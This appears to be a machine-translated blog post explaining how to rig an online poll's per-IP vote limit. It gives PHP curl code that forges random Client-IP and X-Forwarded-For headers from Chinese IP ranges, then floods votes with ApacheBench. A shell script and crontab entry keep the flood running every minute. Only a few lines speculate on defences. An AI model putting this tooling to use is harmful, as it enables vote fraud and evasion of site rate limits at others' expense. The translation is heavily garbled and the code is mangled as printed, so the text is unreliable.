Let me talk a little bit: in fact, there is no one to break the IP limit, because in fact, this limit server ends, the client is awesome, can't break through. As long as you can always repeat the ticket
A friend suddenly came to a website, let me help her vote. I was a better person to talk to, to help her cast. By the way, there are IP restrictions on this website, but voting is an AJAX request. Then the way out.
Very many voting PC sites rely on restricted IP to limit the number of voters. Then I use Curl to forge IP, so I can easily create multiple IPs to vote.
Paste the following PHP code:
Because the other side is a get Ajax request, I am here to paste the Get method, post method, please make your own changes
<?php/** * @author 邹颢 [email protected] */$ip _long = Array (Array (' 607649792 ', ' 608174079 '),// 36.56.0.0-36.63.255.255array (' 1038614528 ', ' 1039007743 '),//61.232.0.0-61.237.255.255array (' 1783627776 ', ' 1784676351 '),//106.80.0.0-106.95.255.255array (' 2035023872 ', ' 2035154943 '),//121.76.0.0-121.77.255.255array (' 2078801920 ', ' 2079064063 '),//123.232.0.0-123.235.255.255array ('-1950089216 ', '-1948778497 '),// 139.196.0.0-139.215.255.255array (' -1425539072 ', ' -1425014785 '),//171.8.0.0-171.15.255.255array ('-1236271104 ', '- 1235419137 '),//182.80.0.0-182.92.255.255array (' -770113536 ', ' -768606209 '),//210.25.0.0-210.47.255.255array ('- 569376768 ', ' -564133889 '),//222.16.0.0-222.95.255.255); $rand _key = Mt_rand (0, 9); $ip = Long2ip (Mt_rand ($ip _long[$ Rand_key][0], $ip _long[$rand _key][1]));//random generation of a ip$url= ' localhost/ip.php ' in the country;//here please fill in the request address of the poll $ch = Curl_init ($url); $ Header = Array ("client-ip:{$ip}", "x-forwarded-for:{$ip}",); curl_setopt ($ch, Curlopt_httpheader, $header) curl_setopt ($ch, Curlopt_returnTRANSFER, True); Get Data back curl_exec ($ch); Curl_close ($ch);
The first part is to randomly generate an IP in the country and then use curl to simulate the request.
Because the site limit is an IP limit of 1 hours to cast 30 tickets, so I am here randomly.
Assuming that the site is limited to 1 IP 1, then it is better to make IP changes in order to generate domestic IP, so that can not be repeated.
Then I'm on, Apache AB, each concurrent 20 votes. The very fast ticket was brushed up.
So what is the solution to this malicious swipe ticket?
I have no good way to defend. But my curl is actually webservice access, this interview is not with a session or a cookie, of course, curl can also simulate with a cookie, Then take the Phpsessionid and bring the session.
However, for an unknown site, he does not know how to deal with. Therefore, assume that the existence of a session will effectively withstand a batch of brush tickets. But do not hint at the prompt is missing session of the text. It is better to give the session an effective period, which will increase the safety level ( But assuming that the drawer knows the principle, it does not mean that he can be defended.
One thing to add: There's a lot of code that says you can get the real IP address of the caller, and I haven't met the right way to get the real IP of the user. If you have one, please leave a message.
If there is any good defense plan, want to leave a message.
Sometimes assuming a timeout can cause a script to break, it's best to run the script every minute with a Crond
The script code is:
#!/bin/shpid= ' Ps-ef |grep localhost/vote.php |grep vote.php | awk ' {print $} '; if [[$pid = =] "]];thenecho" vote is start "; Nohup/usr/bin/ab-n 100000-c http://localhost/vote.php Elseecho "vote.php is running"; fi
The script is to infer every minute that the process exists, and if it does exist, start the process regardless of whether it does not exist.
Plus the ability to run in the background without using Nohup.
At the opening crond every minute running up
Crontab-e
Edit Crond Task
* * * * * */www/web/default/controller/script/vote.sh
The first 5 * numbers are the scripts that represent every minute of the run. If not, please refer to cron data
When you start cron
Service Crond Start
Great work Gaocheng, peace of mind let him brush his own initiative. You can be busy with something else.
Windows planning your own task system and I'm not posting code here
The principle of voting system method to brush the ticket (break the IP limit Brush ticket PHP version)